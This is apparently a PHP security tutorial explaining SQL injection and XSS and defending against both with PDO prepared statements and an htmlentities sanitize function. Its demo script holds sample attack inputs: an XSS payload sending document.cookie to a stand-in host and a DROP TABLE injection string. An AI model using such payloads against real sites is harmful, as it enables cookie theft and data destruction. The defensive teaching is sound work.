I’ve seen a lot of custom-coded PHP applications, which have done it all functionality-wise, but when it came to validating and securing the incoming data from the input fields before saving them into the database, most of them fell short.
A lot of developers I know don't know what SQL Injection or XSS is, and those who do know the terms often don't know how the injection actually happens or how to protect a website against it. This post is about how you can defend against both kinds of injection using just one method.
SQL Injection is basically entering a fragment of SQL of your choice into an input field in such a way that the website executes it when it builds its query. If it succeeds, the attacker can read, modify, or delete whatever the application's database account can reach, which in most applications means the whole database, so you can imagine how dangerous it is.
You might not have witnessed SQL Injection ever on your applications, not because you’ve secured the applications, but because of PHP’s ‘magic_quotes_gpc’ feature, which is enabled by default in PHP versions prior to 5.3 and escapes the incoming data automatically. However, it is strongly recommended not to rely on this setting alone if you are still running an application on an older PHP version to secure it from SQL Injections. The feature has been deprecated as of PHP 5.3 and removed as of PHP 5.4. So if you are planning to upgrade your PHP version, make sure that you first secure all your input. Otherwise, your application will become vulnerable to SQL Injection. I always coded my older PHP applications with this feature disabled, as I’ve always liked having complete control over my code instead of relying on outside factors to secure my code.
The best way to prevent SQL Injection is to use PDO with prepared statements. Every user-supplied value is bound as a parameter, so it reaches the database as data rather than being spliced into the SQL text, and you don't have to escape anything yourself (as long as you never concatenate input into the query string). Prepared statements will not, however, save you from XSS. If your application is still using the old mysql extension (the mysql_* functions, deprecated as of PHP 5.5 and removed as of PHP 7.0), you might already be using 'mysql_real_escape_string' to escape the data. That, too, will not save you from XSS.
So what exactly is XSS? XSS, or cross-site scripting, is a way of injecting client-side JavaScript or HTML into your website. If your application has an input field that takes data from the user and shows it on one of your public pages (for example a comments page), and that output is not secured, an attacker can enter JavaScript in the field and it will run in the browser of every visitor to the page where that content is displayed. This way the attacker can redirect your users to his own site, or steal your users' cookies, log in as them, and take their information.
So how can you protect your applications from both injections? First of all, if you are not using PDO yet, start using it right away instead of the mysql extension, because that extension is removed as of PHP 7.0.
Now create the following function in a global file of your PHP application:
// Encode HTML-significant characters, including both quote styles, as entities.
function sanitize($input) {
    return htmlentities($input, ENT_QUOTES, 'UTF-8');
}
Now pass every input field through the above function before inserting it into the database. What the function does is convert all HTML-significant characters (including single and double quotes) into their equivalent HTML entities, so '<b>bold</b>' is converted into '&lt;b&gt;bold&lt;/b&gt;'.
When that encoded string is stored in the database and later shown on a page, the browser displays it as the literal text '<b>bold</b>' and does not render it as bold. Notice the difference?
All single and double quotes are also converted into '&#039;' and '&quot;' respectively, which protects against quote-based SQL Injection: the quotes are entered into the database as text and have no special meaning in the SQL statement they are passed to. Treat this as a second layer, not a replacement for prepared statements. A value that is placed unquoted into a query (a numeric id, for example) gains nothing from having its quotes encoded, so keep binding every value through PDO. Be aware, too, that because the text is stored already encoded, it will come out HTML-encoded anywhere else you use it (an API response, an e-mail, a CSV export), which is why many developers store the raw text and call the same function at the moment they render the page instead.
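The following is an added example, not code from the original post, that puts the two pieces above together: the sanitize() function, a PDO prepared statement, and one XSS-style and one SQL-style input. It runs against an in-memory SQLite database through PDO so it works offline; the comments table, its columns, and the two sample inputs are constructed for this demonstration and are not from the post.

```php
<?php
// Added example (not from the original post). Requires the pdo_sqlite extension.

// The post's sanitize() function.
function sanitize($input) {
    return htmlentities($input, ENT_QUOTES, 'UTF-8');
}

// In-memory SQLite database and a constructed comments table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

// Constructed attacker-style inputs: one XSS payload, one SQL-style payload.
$inputs = [
    '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    "'; DROP TABLE comments; --",
];

// Prepared statement: the value is bound as data and never spliced into the
// SQL text, so the quote and the DROP TABLE are stored literally, not run.
$insert = $pdo->prepare('INSERT INTO comments (body) VALUES (:body)');
foreach ($inputs as $raw) {
    // As the post recommends, encode before storing.
    $insert->execute([':body' => sanitize($raw)]);
}

// The table still exists and holds both rows, so the SQL payload was inert.
$count = (int) $pdo->query('SELECT COUNT(*) FROM comments')->fetchColumn();
if ($count !== 2) {
    throw new RuntimeException("expected 2 rows, got $count");
}

// Render the stored rows. The browser now sees &lt;script&gt; as text,
// so nothing executes; the encoded quotes come back as &#039; and &quot;.
foreach ($pdo->query('SELECT body FROM comments') as $row) {
    echo '<p>' . $row['body'] . "</p>\n";
}
```

If you would rather store raw text, move the sanitize() call from the execute() line to the echo line; the prepared statement already keeps the SQL payload harmless either way, and encoding at render time keeps the stored value usable in non-HTML contexts.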
I hope you enjoyed the article and learned something from it. Please let me know your feedback by sending me an email.